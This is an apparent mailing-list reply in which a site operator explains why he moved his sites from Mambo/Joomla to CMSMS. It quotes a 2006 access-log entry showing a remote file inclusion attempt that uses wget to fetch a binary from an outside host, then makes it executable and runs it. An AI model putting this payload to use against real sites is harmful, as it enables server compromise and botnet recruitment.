I used to run several Mambo sites, and you're right, with all the
vulnerabilities out there, it keeps you on your toes. It got to be
too time consuming to deal with the tens of thousands of daily exploit
attempts and strange patching for it to be worthwhile to me. I still
have some actual exploit code that I looked at to see what it was the
script kiddies were trying to do. Here's an example from my own logs:
209.67.221.170 - - [15/Feb/2006:15:39:58 +0000] "GET /mambo/index2.php?
_REQUEST[
option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://
2
09.123.16.34/cmd.gif?&cmd=cd%20/tmp;wget%20209.123.16.34/giculo;chmod
%20744%20gi
culo;./giculo;echo%20YYY;echo| HTTP/1.1" 302 - "-" "Mozilla/4.0
(compatible; MS
IE 6.0; Windows NT 5.1;)"
Almost every time, the code they tried to execute was a perl script on
some remote server that would add your computer to a botnet, then make
your computer use google to look for more Mambo/Joomla sites to try
and infect. Really annoying, and there were lots of kiddies that
liked to claim the exact same code as their own.
I never liked the functionality of Mambo/Joomla, but you're right, it
sure is pretty. Instead I've moved my sites to CMSMS, and have had no
problems: no botnets trying to beat down the door, less administrative
hassle, and my web developer likes the environment better.
This was just my own experience, and I haven't touched Joomla in a
year, so ymmv.
-Nick
> Mambo:
http://www.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=m...
>
> Joomla:
http://www.securityfocus.com/swsearch?sbm=%2F&metaname=alldoc&query=J...
>
> Some of these are obviously dated, but they don't present their results
> historically by default so you need to dig... and they _are_ getting it
> locked down a lot better, but as you know you have to patch ALL the holes,
> while your black-hatter only needs to find one. Their stuff is in serious
> need of a top to bottom code audit (and I'm not the guy for that!) but the
> one that bothered me the most was from way back in 2005 (I've seen boxen
> that were exploited like this - honestly, fdisk is the cure):
http://www.securityfocus.com/brief/71
>
> Bugtrack/Security Focus isn't what it used to be. If you wanna find
> exploits for Joomla that might dissuade your use entirely, head over towww.packetstormsecurity.organd see if they have anything "fun" laying